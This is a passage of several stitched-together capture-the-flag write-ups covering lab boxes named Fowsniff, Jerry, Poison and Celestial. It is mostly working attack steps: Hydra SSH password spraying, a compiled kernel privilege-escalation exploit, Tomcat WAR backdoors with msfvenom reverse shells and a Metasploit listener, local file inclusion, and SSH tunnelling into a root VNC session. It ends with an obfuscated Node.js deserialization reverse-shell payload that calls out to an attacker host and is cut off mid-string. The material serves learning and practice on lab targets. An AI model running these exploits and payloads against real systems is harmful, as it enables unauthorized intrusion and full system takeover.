Delivered-To: [s]eina@fowsniff
Received: by fowsniff (Postfix, from userid 1000)
id 0FA3916A; Tue, 13 Mar 2018 14:51:07 -0400 (EDT)
To: [b]aksteen@fowsniff, [m]auer@fowsniff, [m]ursten@fowsniff,
[m]ustikka@fowsniff, [p]arede@fowsniff, [s]ciana@fowsniff, [s]eina@fowsniff,
[t]egel@fowsniff
Subject: URGENT! Security EVENT!
Message-Id: <20180313185107.0FA3916A@fowsniff>
Date: Tue, 13 Mar 2018 14:51:07 -0400 (EDT)
From: [s]tone@fowsniff (stone)

Dear All,

A few days ago, a malicious actor was able to gain entry to
our internal email systems. The attacker was able to exploit
incorrectly filtered escape characters within our SQL database
to access our login credentials. Both the SQL and authentication
system used legacy methods that had not been updated in some time.

We have been instructed to perform a complete internal system
overhaul. While the main systems are "in the shop," we have
moved to this isolated, temporary server that has minimal
functionality.

This server is capable of sending and receiving emails, but only
locally. That means you can only send emails to other users, not
to the world wide web. You can, however, access this system via
the SSH protocol.

The temporary password for SSH is "[S]1ck3nBluff+secureshell"

You MUST change this password as soon as possible, and you will do so under my
guidance. I saw the leak the attacker posted online, and I must say that your
passwords were not very secure.

Come see me in my office at your earliest convenience and we’ll set it up.

Thanks,
A.J Stone

[/bash]

Yes, we got the SSH password! Let’s fire up Hydra again to see who uses this password:

[bash]

hydra -L usernames -p [S]1ck3nBluff+secureshell -e nsr ssh://192.168.56.101
Hydra v8.6 (c) 2017 by van Hauser/THC – Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2018-12-08 20:05:25
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 36 login tries (l:9/p:4), ~3 tries per task
[DATA] attacking ssh://192.168.56.101:22/
[22][ssh] host: 192.168.56.101 login: [b]aksteen password: [S]1ck3nBluff+secureshell
1 of 1 target successfully completed, 1 valid password found
[/bash]

Let’s login using SSH and the aforementioned user.

ssh 192.168.56.101 -l [b]aksteen
The authenticity of host ‘192.168.56.101 (192.168.56.101)’ can’t be established.
[b]aksteen@192.168.56.101’s password:

_____ _ __ __
:sdddddddddddddddy+ | ___|____ _____ _ __ (_)/ _|/ _|
:yNMMMMMMMMMMMMMNmhsso | |_ / _ \ \ /\ / / __| ‘_ \| | |_| |_
.sdmmmmmNmmmmmmmNdyssssso | _| (_) \ V V /\__ \ | | | | _| _|
-: y. dssssssso |_| \___/ \_/\_/ |___/_| |_|_|_| |_|
-: y. dssssssso ____
-: y. dssssssso / ___|___ _ __ _ __
-: y. dssssssso | | / _ \| ‘__| ‘_ \
-: o. dssssssso | |__| (_) | | | |_) | _
-: o. yssssssso \____\___/|_| | .__/ (_)
-: .+mdddddddmyyyyyhy: |_|
-: -odMMMMMMMMMMmhhdy/.
.ohdddddddddddddho: Delivering Solutions

**** Welcome to the Fowsniff Corporate Server! ****

———- NOTICE: ———-

* Due to the recent security breach, we are running on a very minimal system.
* Contact AJ Stone -IMMEDIATELY- about changing your email and SSH passwords.

[/bash]

And we are on the machine!

Privilege escalation

Looking into the home folder of the user, there’s a text file called term.txt.

[bash]

[b]aksteen@fowsniff:~$ cat term.txt
I wonder if the person who coined the term "One Hit Wonder"
came up with another other phrases.

[/bash]

This must be a hint to get root access. I always start with the kernel itself, so lets check it out:

[bash]

uname -a
Linux fowsniff 4.4.0-116-generic #140-Ubuntu SMP Mon Feb 12 21:23:04 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux

[/bash]

Kernel 4.4.0-116 is quite old already. Let’s search the exploitDB to see if there’s anything good.

[bash]

searchsploit Linux 4.4.0-116
————————————————————————– —————————————-
Exploit Title | Path
| (/usr/share/exploitdb/)
————————————————————————– —————————————-
Linux Kernel < 4.4.0-116 (Ubuntu 16.04.4) – Local Privilege Escalation | exploits/linux/local/44298.c
————————————————————————– —————————————-

[/bash]

Perfect, just what we need. I copied the exploit to my local folder and compiled it on my local machine with gcc to a file named pwnage. I’ve then send over the pwnage file to the machine using SCP. Executing it leads to:

[bash]

cp /usr/share/exploitdb/exploits/linux/local/44298.c .

gcc -o pwnage 44298.c

./pwnage
task_struct = ffff88001a917000
uidptr = ffff88001af89b44
spawning root shell

root@fowsniff:/root# cat flag.txt
___ _ _ _ _ _
/ __|___ _ _ __ _ _ _ __ _| |_ _ _| |__ _| |_(_)___ _ _ __| |
| (__/ _ \ ‘ \/ _` | ‘_/ _` | _| || | / _` | _| / _ \ ‘ \(_-<_|
\___\___/_||_\__, |_| \__,_|\__|\_,_|_\__,_|\__|_\___/_||_/__(_)
|___/

(_)
|————–
|&&&&&&&&&&&&&&|
| R O O T |
| F L A G |
|&&&&&&&&&&&&&&|
|————–
|
|
|
|
|
|
—

Nice work!

This CTF was built with love in every byte by @berzerk0 on Twitter.

Special thanks to psf, @nbulischeck and the whole Fofao Team.

[/bash]

Site just retired, focussed on Tomcat and malicious WAR files! Lets get started.

Enumeration

As always, lets Nmap the box:

[bash]

Nmap 7.70 scan initiated Sat Jun 30 19:27:39 2018 as: nmap -sC -sV -oA initial-nmap -p- 10.10.10.95
Nmap scan report for 10.10.10.95
Host is up (0.22s latency).
Not shown: 65534 filtered ports
PORT STATE SERVICE VERSION
8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1
|_http-favicon: Apache Tomcat
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache Tomcat/7.0.88

[/bash]

Initial scan shows that a site is running at 8080 and that it is probably a Tomcatsite. Lets’s connect:

Yep. Thats Tomcat alright. Lets start gobuster to see what dirs we can find:

[bash]

sudo gobuster -u &lt;a href="http://10.10.10.95:8080"&gt;http://10.10.10.95:8080&lt;/a&gt; -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x html,pdf,txt,cgi,php

Gobuster v1.4.1 OJ Reeves (@TheColonial)
=====================================================
=====================================================
[+] Mode : dir
[+] Url/Domain : &lt;a href="http://10.10.10.95:8080/"&gt;http://10.10.10.95:8080/&lt;/a&gt;
[+] Threads : 10
[+] Wordlist : /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Status codes : 301,302,307,200,204
[+] Extensions : .html,.pdf,.txt,.cgi,.php
=====================================================
/docs (Status: 302)
/test (Status: 302)
/examples (Status: 302)
/manager (Status: 302)

[/bash]

That /manager part looks interesting. It’s also noted on the screenshot above. Lets visit the url:

It triggers a user name and password. Lets press Escape to get out of the login. Huh, we’re presented with a weird error message.

So the error message displays how to setup a user. As an example, it notes ‘tomcat’ as user name and ‘s3cret’ as a password. What happens if we just try these default credentials?

Guess we are lucky :).

Exploitation

After doing some research, I end up at this site that describes how to create a WAR package that triggers a reverse shell. The post from 2012 explains:

“If we have performed a penetration test against an Apache Tomcat server and we have managed to gain access then we might want to consider to place a web backdoor in order to maintain our access.Apache Tomcat accepts .WAR file types so our backdoor must have this file extension.In case that we don’t have a WAR backdoor already in our disposal we can use Metasploit to create one very fast.” Searching Metasploit didn’t really give me anything useful intially, so I Googled on. It then found the tomcatWarDeployer, which perfectly seemed to fit my needs.

Lets run it:

[bash]

sudo python tomcatWarDeployer.py -v -U tomcat -P s3cret -H mylocalIPadress -p 1337 10.10.10.95:8080

tomcatWarDeployer (v. 0.4)
Apache Tomcat auto WAR deployment & launching tool
Mariusz B. / MGeeky ’16-18

Penetration Testing utility aiming at presenting danger of leaving Tomcat misconfigured.

INFO: Reverse shell will connect to: mylocalIPadress:1337.
DEBUG: Browsing to "<a href="http://10.10.10.95:8080/">http://10.10.10.95:8080/"…</a> Creds: "tomcat:s3cret"
DEBUG: Trying to fetch: "<a href="http://10.10.10.95:8080/">http://10.10.10.95:8080/"</a>
DEBUG: Probably found something: Apache Tomcat/7.0.88
DEBUG: Trying to fetch: "<a href="http://10.10.10.95:8080/manager">http://10.10.10.95:8080/manager"</a>
DEBUG: Probably found something: Apache Tomcat/7.0.88
DEBUG: Apache Tomcat/7.0.88 Manager Application reached & validated.
DEBUG: Generating JSP WAR backdoor code…
DEBUG: Preparing additional code for Reverse TCP shell
DEBUG: Generating temporary structure for jsp_app WAR at: "/tmp/tmpkmv2aR"
DEBUG: Working with Java at version: 10.0.1
DEBUG: Generating web.xml with servlet-name: "JSP Application"
DEBUG: Generating WAR file at: "/tmp/jsp_app.war"
DEBUG: added manifest
adding: files/(in = 0) (out= 0)(stored 0%)
adding: files/WEB-INF/(in = 0) (out= 0)(stored 0%)
adding: files/WEB-INF/web.xml(in = 505) (out= 254)(deflated 49%)
adding: files/META-INF/(in = 0) (out= 0)(stored 0%)
adding: files/META-INF/MANIFEST.MF(in = 66) (out= 66)(deflated 0%)
adding: index.jsp(in = 4494) (out= 1686)(deflated 62%)
INFO: It looks that the application with specified name "jsp_app" has not been deployed yet.
DEBUG: Deploying application: jsp_app from file: "/tmp/jsp_app.war"
DEBUG: Removing temporary WAR directory: "/tmp/tmpkmv2aR"
DEBUG: Succeeded, invoking it…
DEBUG: Spawned shell handling thread. Awaiting for the event…
DEBUG: Awaiting for reverse-shell handler to set-up
DEBUG: Establishing listener for incoming reverse TCP shell at mylocalIPadress:1337
DEBUG: Socket is binded to local port now, awaiting for clients…
DEBUG: Invoking application at url: "<a href="http://10.10.10.95:8080/jsp_app/">http://10.10.10.95:8080/jsp_app/"</a>
DEBUG: Adding ‘X-Pass: 9PHwwfFA9Ald’ header for shell functionality authentication.
DEBUG: Incoming client: 10.10.10.95:49195
DEBUG: Application invoked correctly.
INFO: JSP Backdoor up & running on <a href="http://10.10.10.95:8080/jsp_app/">http://10.10.10.95:8080/jsp_app/</a>
INFO: Happy pwning. Here take that password for web shell: ‘9PHwwfFA9Ald’
INFO: Connected with: nt authority\system@JERRY

C:\apache-tomcat-7.0.88> whoami
nt authority\system

[/bash]

Game, set and match.

Another way to do this, is to use msfvenom to generate a payload. We then upload the payload and execute it by visiting it. On our end, we setup a listener and upgrade the shell we get to meterpretershell. I got this idea from the following Youtube video:

https://www.youtube.com/watch?v=wF9CJ59D0tQ

First, generate the payload:

[bash]

msfvenom -p java/shell_reverse_tcp LHOST= XXX LPORT=1337 -f war > pwnd.war

sudo msfvenom -p java/shell_reverse_tcp LHOST=mylocalIPadress LPORT=1337 -f war > pwnd.war
Payload size: 13402 bytes
Final size of war file: 13402 bytes

[/bash]

Then, setup a listener to catch the session:

[bash]

msf exploit(multi/handler) > set LHOST mylocalIPadress
LHOST => mylocalIPadress
msf exploit(multi/handler) > set LPORT 1337
LPORT => 1337
msf exploit(multi/handler) > set LHOST tun0
LHOST => tun0
msf exploit(multi/handler) > set payload java/shell_reverse_tcp
payload => java/shell_reverse_tcp
msf exploit(multi/handler) > run

[/bash]

Proceed to upload the .war file and visit the approriate site to trigger the payload. You should get a shell:

[bash]

[*] Started reverse TCP handler on mylocalIPadress:1337
[*] Command shell session 1 opened (mylocalIPadress:1337 -> 10.10.10.95:49196) at 2018-07-07 18:46:33 +0000

Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\apache-tomcat-7.0.88>

Background session 1? [y/N] y

[/bash]

After background the session, you can use the shell_to_meterpreter module to upgrade the session.

[bash]

Name Disclosure Date Rank Description
—- ————— —- ———–
post/multi/manage/shell_to_meterpreter normal Shell to Meterpreter Upgrade

msf exploit(multi/handler) > use post/multi/manage/shell_to_meterpreter

msf post(multi/manage/shell_to_meterpreter) > set LPORT 1337
LPORT => 1337
msf post(multi/manage/shell_to_meterpreter) > run
msf post(multi/manage/shell_to_meterpreter) > sessions -l

Active sessions
===============

Id Name Type Information Connection
— —- —- ———– ———-
1 shell java/java Microsoft Windows [Version 6.3.9600] (c) 2013 Microsoft Corporation. All righ… mylocalIPadress:1337 -> 10.10.10.95:49196 (10.10.10.95)

msf post(multi/manage/shell_to_meterpreter) > set SESSION 1
SESSION => 1

C:\Users\Administrator\Desktop\flags>

[/bash]

Privilege escalation

Not needed, since you are already sytem. Flags can be found in C:\Users\Administrator\Desktop\flags>

As always, IppSec created an awesome and very informative video about this box.

Great box over at hackthebox.eu, which learned me a nifty new trick. Lets get started!

Enumeration

As always, we start with a full nmap scan:

[bash]

sudo nmap -sV -sC -oA initial -p- 10.10.10.84

Nmap scan report for 10.10.10.84
Host is up (0.038s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2 (FreeBSD 20161230; protocol 2.0)
| ssh-hostkey:
| 2048 e3:3b:7d:3c:8f:4b:8c:f9:cd:7f:d2:3a:ce:2d:ff:bb (RSA)
| 256 4c:e8:c6:02:bd:fc:83:ff:c9:80:01:54:7d:22:81:72 (ECDSA)
|_ 256 0b:8f:d5:71:85:90:13:85:61:8b:eb:34:13:5f:94:3b (ED25519)
80/tcp open http Apache httpd 2.4.29 ((FreeBSD) PHP/5.6.32)
|_http-server-header: Apache/2.4.29 (FreeBSD) PHP/5.6.32
|_http-title: Site doesn’t have a title (text/html; charset=UTF-8).
Service Info: OS: FreeBSD; CPE: cpe:/o:freebsd:freebsd

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 413.45 seconds

[/bash]

So we have port 80 running a HTTP service and port 22 running SSH.

Browsing to webpage displays the following:

We can run the following commands: Sites to be tested: ini.php, info.php, listfiles.php, phpinfo.php

info.php reveals the following:

[bash]

FreeBSD Poison 11.1-RELEASE FreeBSD 11.1-RELEASE #0 r321309: Fri Jul 21 02:08:28 UTC 2017 root@releng2.nyi.freebsd.org:/usr/obj/usr/src/sys/GENERIC amd64

[/bash]

The machine runs FreeBSD 11.1. This might come in handy later. Running listfiles.php shows:

[bash]

Array ( [0] =. [1]; .. [2]; browse.php [3]; index.php; info.php; ini.php; listfiles.php; phpinfo.php; pwdbackup.txt )

[/bash]

That sounds like an interesting file. First lets see what happens when we change the parameter after the file= part:

[bash]

http://10.10.10.84/browse.php?file=/etc/passwd

# $FreeBSD: releng/11.1/etc/master.passwd 299365 2016-05-10 12:47:36Z bcr

$ # root:*:0:0:Charlie &amp;amp;amp;amp;amp;:/root:/bin/csh toor:*:0:0:Bourne-again Superuser:/root:

daemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin

operator:*:2:5:System &amp;amp;amp;amp;amp;:/:/usr/sbin/nologin bin:*:3:7:Binaries Commands and

Source:/:/usr/sbin/nologin tty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin

kmem:*:5:65533:KMem Sandbox:/:/usr/sbin/nologin games:*:7:13:Games

pseudo-user:/:/usr/sbin/nologin news:*:8:8:News

Subsystem:/:/usr/sbin/nologin man:*:9:9:Mister Man

Pages:/usr/share/man:/usr/sbin/nologin sshd:*:22:22:Secure Shell

Daemon:/var/empty:/usr/sbin/nologin smmsp:*:25:25:Sendmail Submission

User:/var/spool/clientmqueue:/usr/sbin/nologin mailnull:*:26:26:Sendmail

Default User:/var/spool/mqueue:/usr/sbin/nologin bind:*:53:53:Bind

Sandbox:/:/usr/sbin/nologin unbound:*:59:59:Unbound DNS

Resolver:/var/unbound:/usr/sbin/nologin proxy:*:62:62:Packet Filter pseudo-

user:/nonexistent:/usr/sbin/nologin _pflogd:*:64:64:pflogd privsep

user:/var/empty:/usr/sbin/nologin _dhcp:*:65:65:dhcp

programs:/var/empty:/usr/sbin/nologin uucp:*:66:66:UUCP pseudo-

user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico pop:*:68:6:Post

Office Owner:/nonexistent:/usr/sbin/nologin auditdistd:*:78:77:Auditdistd

unprivileged user:/var/empty:/usr/sbin/nologin www:*:80:80:World Wide Web

Owner:/nonexistent:/usr/sbin/nologin _ypldap:*:160:160:YP LDAP unprivileged

user:/var/empty:/usr/sbin/nologin hast:*:845:845:HAST unprivileged

user:/var/empty:/usr/sbin/nologin nobody:*:65534:65534:Unprivileged

user:/nonexistent:/usr/sbin/nologin _tss:*:601:601:TrouSerS

user:/var/empty:/usr/sbin/nologin messagebus:*:556:556:D-BUS Daemon

User:/nonexistent:/usr/sbin/nologin avahi:*:558:558:Avahi Daemon

User:/nonexistent:/usr/sbin/nologin cups:*:193:193:Cups

Owner:/nonexistent:/usr/sbin/nologin

charix:*:1001:1001:charix:/home/charix:/bin/csh

[/bash]

So our user is probably charix.

Lets see what is in that pwdbackup.txt file by using: http://10.10.10.84/browse.php?file=pwdbackup.txt

[bash]

This password is secure, it’s encoded atleast 13 times.. what could go wrong really..

Vm0wd2QyUXlVWGxWV0d4WFlURndVRlpzWkZOalJsWjBUVlpPV0ZKc2JETlhhMk0xVmpKS1IySkVUbGhoTVVwVVZtcEdZV015U2tWVQpiR2hvVFZWd1ZWWnRjRWRUTWxKSVZtdGtXQXBpUm5CUFdWZDBSbVZHV25SalJYUlVUVlUxU1ZadGRGZFZaM0JwVmxad1dWWnRNVFJqCk1EQjRXa1prWVZKR1NsVlVWM040VGtaa2NtRkdaR2hWV0VKVVdXeGFTMVZHWkZoTlZGSlRDazFFUWpSV01qVlRZVEZLYzJOSVRsWmkKV0doNlZHeGFZVk5IVWtsVWJXaFdWMFZLVlZkWGVHRlRNbEY0VjI1U2ExSXdXbUZEYkZwelYyeG9XR0V4Y0hKWFZscExVakZPZEZKcwpaR2dLWVRCWk1GWkhkR0ZaVms1R1RsWmtZVkl5YUZkV01GWkxWbFprV0dWSFJsUk5WbkJZVmpKMGExWnRSWHBWYmtKRVlYcEdlVmxyClVsTldNREZ4Vm10NFYwMXVUak5hVm1SSFVqRldjd3BqUjJ0TFZXMDFRMkl4WkhOYVJGSlhUV3hLUjFSc1dtdFpWa2w1WVVaT1YwMUcKV2t4V2JGcHJWMGRXU0dSSGJFNWlSWEEyVmpKMFlXRXhXblJTV0hCV1ltczFSVmxzVm5kWFJsbDVDbVJIT1ZkTlJFWjRWbTEwTkZkRwpXbk5qUlhoV1lXdGFVRmw2UmxkamQzQlhZa2RPVEZkWGRHOVJiVlp6VjI1U2FsSlhVbGRVVmxwelRrWlplVTVWT1ZwV2EydzFXVlZhCmExWXdNVWNLVjJ0NFYySkdjR2hhUlZWNFZsWkdkR1JGTldoTmJtTjNWbXBLTUdJeFVYaGlSbVJWWVRKb1YxbHJWVEZTVm14elZteHcKVG1KR2NEQkRiVlpJVDFaa2FWWllRa3BYVmxadlpERlpkd3BOV0VaVFlrZG9hRlZzWkZOWFJsWnhVbXM1YW1RelFtaFZiVEZQVkVaawpXR1ZHV210TmJFWTBWakowVjFVeVNraFZiRnBWVmpOU00xcFhlRmRYUjFaSFdrWldhVkpZUW1GV2EyUXdDazVHU2tkalJGbExWRlZTCmMxSkdjRFpOUkd4RVdub3dPVU5uUFQwSwo=

[/bash]

Looking at the way the key was constructed, it looks like a base64 encoded key. The hint points us to that it is probably encoded 13 times. I’ve used the Cyberchef from GCHQ to decrypt the thing. It gives us the following key

[bash]

Charix!2#4%6&amp;amp;amp;8(0

[/bash]

The only service we’ve seen so far is the SSH service.

Exploitation

ssh 10.10.10.84 -l charix

Password: Charix!2#4%6&8(0

And we’re logged in.

Privilege Escalation

After running LinEnum, I noticed that a VNC service is running as root. To further explore this. Running LinEnum, I see that root is running VNC on 5901 and 5801, as well as sshd (which I already used to get access to the box). So, I probably need to setup a SSH tunnel to this machine and use VNC viewer to get access to the VNC-sessions on the Poisoin host.

I do the following:

[bash]

charix@Poison:~ % sockstat -l
USER COMMAND PID FD PROTO LOCAL ADDRESS FOREIGN ADDRESS
www httpd 713 3 tcp6 *:80 *:*
www httpd 713 4 tcp4 *:80 *:*
www httpd 712 3 tcp6 *:80 *:*
www httpd 712 4 tcp4 *:80 *:*
www httpd 711 3 tcp6 *:80 *:*
www httpd 711 4 tcp4 *:80 *:*
root sendmail 642 3 tcp4 127.0.0.1:25 *:*
www httpd 641 3 tcp6 *:80 *:*
www httpd 641 4 tcp4 *:80 *:*
www httpd 640 3 tcp6 *:80 *:*
www httpd 640 4 tcp4 *:80 *:*
www httpd 639 3 tcp6 *:80 *:*
www httpd 639 4 tcp4 *:80 *:*
www httpd 638 3 tcp6 *:80 *:*
www httpd 638 4 tcp4 *:80 *:*
www httpd 637 3 tcp6 *:80 *:*
www httpd 637 4 tcp4 *:80 *:*
root httpd 625 3 tcp6 *:80 *:*
root httpd 625 4 tcp4 *:80 *:*
root sshd 620 3 tcp6 *:22 *:*
root sshd 620 4 tcp4 *:22 *:*
root Xvnc 529 0 stream /tmp/.X11-unix/X1
root Xvnc 529 1 tcp4 127.0.0.1:5901 *:*
root Xvnc 529 3 tcp4 127.0.0.1:5801 *:*
root syslogd 390 4 dgram /var/run/log
root syslogd 390 5 dgram /var/run/logpriv
root syslogd 390 6 udp6 *:514 *:*
root syslogd 390 7 udp4 *:514 *:*
root devd 319 4 stream /var/run/devd.pipe
root devd 319 5 seqpac /var/run/devd.seqpacket.pipe

[/bash]

I used  http://www.cl.cam.ac.uk/research/dtg/attarchive/vnc/sshvnc.html  and https://null-byte.wonderhowto.com/how-to/remotely-control-computers-over-vnc-securely-with-ssh-0132656/ for research.

There is also a secret.zip file on the machine. Let’s start by setting up a tunnel:

[bash]

ssh -L 5901:localhost:5901 -N -f -l charix 10.10.10.84

[/bash]

Using vncviewer, we can get access to the desktop of the root user, which contains the key:

[bash]

vncviewer -passwd secret
Use localhost:5901 to get access.
[/bash]

Fun box that allowed me to get some experience with NodeJS stuff. Lets get started!

Enumeration

As always, lets perform a nmap to start with

[bash]

map -sC -sV -p- -oA initial 10.10.10.85
Starting Nmap 7.70 ( https://nmap.org ) at 2018-08-23 19:01 UTC</pre>
Nmap scan report for 10.10.10.85
Host is up (0.024s latency).
Not shown: 65534 closed ports
PORT STATE SERVICE VERSION
3000/tcp open http Node.js Express framework
|_http-title: Site doesn’t have a title (text/html; charset=utf-8).

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 22.38 seconds

[/bash]

Browsing the site gives a 404 error. Both gobuster and dirbuster give me no results. I then realized that I was using port 80… Stupid. Running gobuster and dirbuster on port 3000 gave me the same result. However, just browsing the site gives me a message:

“Hey dummy. 2 + 2 is 22.” Sounds like we need to manipulate the HTTP request. Lets fire up Burp. Using repeater, the following headers are displayed:

GET / HTTP/1.1
Host: 10.10.10.85:3000
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: profile=eyJ1c2VybmFtZSI6IkR1bW15IiwiY291bnRyeSI6IklkayBQcm9iYWJseSBTb21ld2hlcmUgRHVtYiIsImNpdHkiOiJMYW1ldG93biIsIm51bSI6IjIifQ%3D%3D
Connection: close
Upgrade-Insecure-Requests: 1
If-None-Match: W/”c-8lfvj2TmiRRvB7K+JPws1w9h6aY”

Doing some research, it seems that NodeJS translates = symbols to %3D, Translating the string gives:

eyJ1c2VybmFtZSI6IkR1bW15IiwiY291bnRyeSI6IklkayBQcm9iYWJseSBTb21ld2hlcmUgRHVtYiIsImNpdHkiOiJMYW1ldG93biIsIm51bSI6IjIifQ==

I think that’s base64 used to encode the string. Running it through Cyberchef gives me the following output:

{“username”:”Dummy”,”country”:”Idk Probably Somewhere Dumb”,”city”:”Lametown”,”num”:”2″}

Sounds like the server is allowing command execution. From the nmap, we know that the site is running NodeJS. Some research gave me the following clues on NodeJS security and reverse shells. It seems that NodeJS does allow for some RCE using deserialization.

Exploitation

Looking around a bit, I found a reverse NodeJS shell code on Github that could work, after some tweaks. I replaced the LHOST and LPORT with my current IP (10.10.x.x) and port (8081) on which I told netcat to wait for the shell using:

[bash]

nc -lnvp 8081

[/bash]

After making the changes to the payload, it generates a string to use:

[bash]

sudo python nodejsshell.py 10.10.14.28 8081
[+] LHOST = 10.10.X.X
[+] LPORT = 8081
[+] Encoding
eval(String.fromCharCode(10,118,97,114,32,110,101,116,32,61,32,114,101,113,117,105,114,101,40,39,110,101,116,39,41,59,10,118,97,114,32,115,112,97,119,110,32,61,32,114,101,113,117,105,114,101,40,39,99,104,105,108,100,95,112,114,111,99,101,115,115,39,41,46,115,112,97,119,110,59,10,72,79,83,84,61,34,49,48,46,49,48,46,49,52,46,50,56,34,59,10,80,79,82,84,61,34,56,48,56,49,34,59,10,84,73,77,69,79,85,84,61,34,53,48,48,48,34,59,10,105,102,32,40,116,121,112,101,111,102,32,83,116,114,105,110,103,46,112,114,111,116,111,116,121,112,101,46,99,111,110,116,97,105,110,115,32,61,61,61,32,39,117,110,100,101,102,105,110,101,100,39,41,32,123,32,83,116,114,105,110,103,46,112,114,111,116,111,116,121,112,101,46,99,111,110,116,97,105,110,115,32,61,32,102,117,110,99,116,105,111,110,40,105,116,41,32,123,32,114,101,116,117,114,110,32,116,104,105,115,46,105,110,100,101,120,79,102,40,105,116,41,32,33,61,32,45,49,59,32,125,59,32,125,10,102,117,110,99,116,105,111,110,32,99,40,72,79,83,84,44,80,79,82,84,41,32,123,10,32,32,32,32,118,97,114,32,99,108,105,101,110,116,32,61,32,110,101,119,32,110,101,116,46,83,111,99,107,101,116,40,41,59,10,32,32,32,32,99,108,105,101,110,116,46,99,111,110,110,101,99,116,40,80,79,82,84,44,32,72,79,83,84,44,32,102,117,110,99,116,105,111,110,40,41,32,123,10,32,32,32,32,32,32,32,32,118,97,114,32,115,104,32,61,32,115,112,97,119,110,40,39,47,98,105,110,47,115,104,39,44,91,93,41,59,10,32,32,32,32,32,32,32,32,99,108,105,101,110,116,46,119,114,105,116,101,40,34,67,111,110,110,101,99,116,101,100,33,92,110,34,41,59,10,32,32,32,32,32,32,32,32,99,108,105,101,110,116,46,112,105,112,101,40,115,104,46,115,116,100,105,110,41,59,10,32,32,32,32,32,32,32,32,115,104,46,115,116,100,111,117,116,46,112,105,112,101,40,99,108,105,101,110,116,41,59,10,32,32,32,32,32,32,32,32,115,104,46,115,116,100,101,114,114,46,112,105,112,101,40,99,108,105,101,110,116,41,59,10,32,32,32,32,32,32,32,32,115,104,46,111,110,40,39,101,120,105,116,39,44,102,117,110,99,116,105,111,110,40,99,111,100,101,44,115,105,103,110,97,108,41,123,10,32,32,32,32,32,32,32,32,32,32,99,108,105,101,110,116,46,101,110,100,40,34,68,105,115,99,111,110,110,101,99,116,101,100,33,92,110,34,41,59,10,32,32,32,32,32,32,32,32,125,41,59,10,32,32,32,32,125,41,59,10,32,32,32,32,99,108,105,101,110,116,46,111,110,40,39,101,114,114,111,114,39,44,32,102,117,110,99,116,105,111,110,40,101,41,32,123,10,32,32,32,32,32,32,32,32,115,101,116,84,105,109,101,111,117,116,40,99,40,72,79,83,84,44,80,79,82,84,41,44,32,84,73,77,69,79,85,84,41,59,10,32,32,32,32,125,41,59,10,125,10,99,40,72,79,83,84,44,80,79,82,84,41,59,10))

{"rce":"_$$ND_FUNC$$_function (){eval(String.fromCharCode(10,118,97,114,32,110,101,116,32,61,32,114,101,113,117,105,114,101,40,39,110,101,116,39,41,59,10,118,97,114,32,115,112,97,119,110,32,61,32,114,101,113,117,105,114,101,40,39,99,104,105,108,100,95,112,114,111,99,101,115,115,39,41,46,115,112,97,119,110,59,10,72,79,83,84,61,34,49,48,46,49,48,46,49,52,46,50,56,34,59,10,80,79,82,84,61,34,56,48,56,49,34,59,10,84,73,77,69,79,85,84,61,34,53,48,48,48,34,59,10,105,102,32,40,116,121,112,101,111,102,32,83,116,114,105,110,103,46,112,114,111,116,111,116,121,112,101,46,99,111,110,116,97,105,110,115,32,61,61,61,32,39,117,110,100,101,102,105,110,101,100,39,41,32,123,32,83,116,114,105,110,103,46,112,114,111,116,111,116,121,112,101,46,99,111,110,116,97,105,110,115,32,61,32,102,117,110,99,116,105,111,110,40,105,116,41,32,123,32,114,101,116,117,114,110,32,116,104,105,115,46,105,110,100,101,120,79,102,40,105,116,41,32,33,61,32,45,49,59,32,125,59,32,125,10,102,117,110,99,116,105,111,110,32,99,40,72,79,83,84,44,80,79,82,84,41,32,123,10,32,32,32,32,118,97,114,32,99,108,105,101,110,116,32,61,32,110,101,119,32,110,101,116,46,83,111,99,107,101,116,40,41,59,10,32,32,32,32,99,108,105,101,110,116,46,99,111,110,110,101,99,116,40,80,79,82,84,44,32,72,79,83,84,44,32,102,117,110,99,116,105,111,110,40,41,32,123,10,32,32,32,32,32,32,32,32,118,97,114,32,115,104,32,61,32,115,112,97,119,110,40,39,47,98,105,110,47,115,104,39,44,91,93,41,59,10,32,32,32,32,32,32,32,32,99,108,105,101,110,116,46,119,114,105,116,101,40,34,67,111,110,110,101,99,116,101,100,33,92,110,34,41,59,10,32,32,32,32,32,32,32,32,99,108,105,101,110,116,46,112,105,112,101,40,115,104,46,115,116,100,105,110,41,59,10,32,32,32,32,32,32,32,32,115,104,46,115,116,100,111,117,116,46,112,105,112,101,40,99,108,105,101,110,116,41,59,10,32,32,32,32,32,32,32,32,115,104,46,115,116,100,101,114,114,46,112,105,112,101,40,99,108,105,101,110,116,41,59,10,32,32,32,32,32,32,32,32,115,104,46,111,110,40,39,101,120,105,116,39,44,102,117,110,99,116,105,111,110,40,99,111,100,101,44,115,105,103,110,97,108,41,123,10,32,32,32,32,32,32,32,32,32,32,99,108,105,101,110,116,46,101,110,100,40,34,68,105,115,99,111,110,110,101,99,116,101,100,33,92,110,34,41,59,10,32,32,32,32,32,32,32,32,125,41,59,10,32,32,32,32,125,41,59,10,32,32,32,32,99,108,105,101,110,116,46,111,110,40,39,101,114,114,111,114,39,44,32,102,117,110,99,116,105,111,110,40,101,41,32,123,10,32,32,32,32,32,32,32,32,115,101,116,84,105,109,101,111,117,116,40,99,40,72,79,83,84,44,80,79,82,84,41,44,32,84,73,77,69,79,85,84,41,59,10,32,32,